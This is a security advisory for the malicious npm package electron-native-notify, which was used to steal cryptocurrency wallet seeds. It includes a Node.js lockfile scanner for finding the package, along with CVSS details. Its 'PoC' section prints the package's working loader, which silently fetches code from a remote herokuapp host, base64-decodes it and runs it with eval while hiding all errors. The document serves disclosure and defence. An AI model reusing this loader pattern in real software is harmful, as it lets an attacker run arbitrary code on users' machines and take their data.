Malicious Package

Affecting electron-native-notify package, versions >0.0.1-security

Overview

electron-native-notify is a malicious package.

This package contains malicious code and was part of a targeted attack to steal cryptocurrency wallet seeds and upload them to a remote server, effectively giving attackers access to users' wallets.

PoC

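// Uses Node's require, or electron.remote.require when running in an Electron renderer process.
// Fetches a response from the remote server, base64-decodes it and passes it to eval().
// Every error is swallowed, so the host application shows no sign of the request.
try {
    (process && "renderer" === process.type ? require("electron").remote.require : require)("https").get("https://updatecheck.herokuapp.com/check", res => res.on("data", d => {
        try {
            eval((atob || (e => "" + Buffer.from(e, "base64")))("" + d))
        } catch (e) {}
    }))
} catch (e) {}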

Remediation

Avoid using electron-native-notify altogether.
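
One way to act on this remediation, as an added example (not Snyk's or the package's code): a Node.js function that searches a parsed package-lock.json, in both the nested v1 layout and the flat v2/v3 layout, for direct or transitive copies of electron-native-notify. It assumes any version other than the 0.0.1-security placeholder is affected, a simplification of the >0.0.1-security range above; the sample lockfiles, "some-wallet-ui" and version 9.9.9 are constructed.

```javascript
// Added example: find electron-native-notify in a parsed package-lock.json.
const BAD_NAME = "electron-native-notify";
const PLACEHOLDER = "0.0.1-security"; // assumption: only this version is unaffected

// Returns [{ path, version, affected }] for every copy recorded in the lockfile.
function findMaliciousPackage(lock) {
  const hits = [];
  const record = (path, version) =>
    hits.push({ path, version, affected: version !== PLACEHOLDER });

  // lockfileVersion 2/3: flat "packages" map keyed by install path.
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === `node_modules/${BAD_NAME}` || path.endsWith(`/node_modules/${BAD_NAME}`)) {
      record(path, meta.version);
    }
  }
  // v2 files repeat the tree under "dependencies"; skip it to avoid duplicates.
  if (lock.packages) return hits;

  // lockfileVersion 1: nested "dependencies" tree; walk it to catch transitive copies.
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      if (name === BAD_NAME) record([...trail, name].join(" > "), meta.version);
      walk(meta.dependencies, [...trail, name]);
    }
  };
  walk(lock.dependencies, []);
  return hits;
}

// Constructed sample lockfiles; "some-wallet-ui" and version 9.9.9 are made up.
const sampleV1 = {
  lockfileVersion: 1,
  dependencies: {
    "some-wallet-ui": {
      version: "2.0.0",
      dependencies: { "electron-native-notify": { version: "9.9.9" } },
    },
  },
};
const sampleV3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app" },
    "node_modules/some-wallet-ui/node_modules/electron-native-notify": { version: "9.9.9" },
    "node_modules/electron-native-notify": { version: "0.0.1-security" },
  },
};
console.log(findMaliciousPackage(sampleV1), findMaliciousPackage(sampleV3));
```

To check a real project, pass the result of JSON.parse on its package-lock.json to findMaliciousPackage and treat any entry with affected set to true as a finding.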

CVSS Score

10.0 (high severity)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Changed
  • Confidentiality: High
  • Integrity: High
  • Availability: High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Credit: Adam Baldwin
CWE: CWE-506
Snyk ID: SNYK-JS-ELECTRONNATIVENOTIFY-174928
Disclosed: 05 Jun, 2019
Published: 07 Jun, 2019